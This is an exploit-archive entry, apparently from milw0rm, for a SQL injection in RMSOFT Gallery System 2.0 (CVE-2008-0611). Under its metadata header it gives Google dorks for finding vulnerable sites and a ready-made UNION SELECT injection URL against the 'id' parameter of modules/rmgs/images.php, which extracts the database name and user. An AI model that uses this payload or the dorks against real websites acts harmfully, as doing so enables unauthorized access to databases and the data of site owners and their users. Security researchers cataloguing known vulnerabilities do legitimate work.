RMSOFT Gallery System 2.0 - 'id' SQL Injection

Author: you_kn0w
type: webapps
platform: php
port: 
date_added: 2008-02-04 
date_updated: 2016-11-09 
verified: 1 
codes: OSVDB-41121;CVE-2008-0611 
tags: 
aliases:  
screenshot_url:  
application_url: 

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=#
# ~Author: you_kn0w	                       #
# ~Contact: you-know[at]linuxmail.org          #
# ~Website: www.youknowz.info                  #
# ~Script: RRMSOFT Gallery                     #
# ~Bug: RRMSOFT Gallery Remote SQL Injection   #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
#               Script Information             #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
#                                              #
# Script name: RRMSOFT Gallery System          #
# Script site: http://www.xoopsmexico.net      #
# Script get:  www.xoopsmexico.net/modules/rmdp#
# Description:  PHP media gallery System       #
# Version: 2.0                                 #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#

# [-]Dorks:
             intext:Powered by RMSOFT GS 2.0
           inurl:modules/rmgs/images.php



# [+]How To Exploit:

 http://[target].com/[path]/modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*



# [+]Greetz:

 Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo

//you_kn0w
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# milw0rm.com [2008-02-05]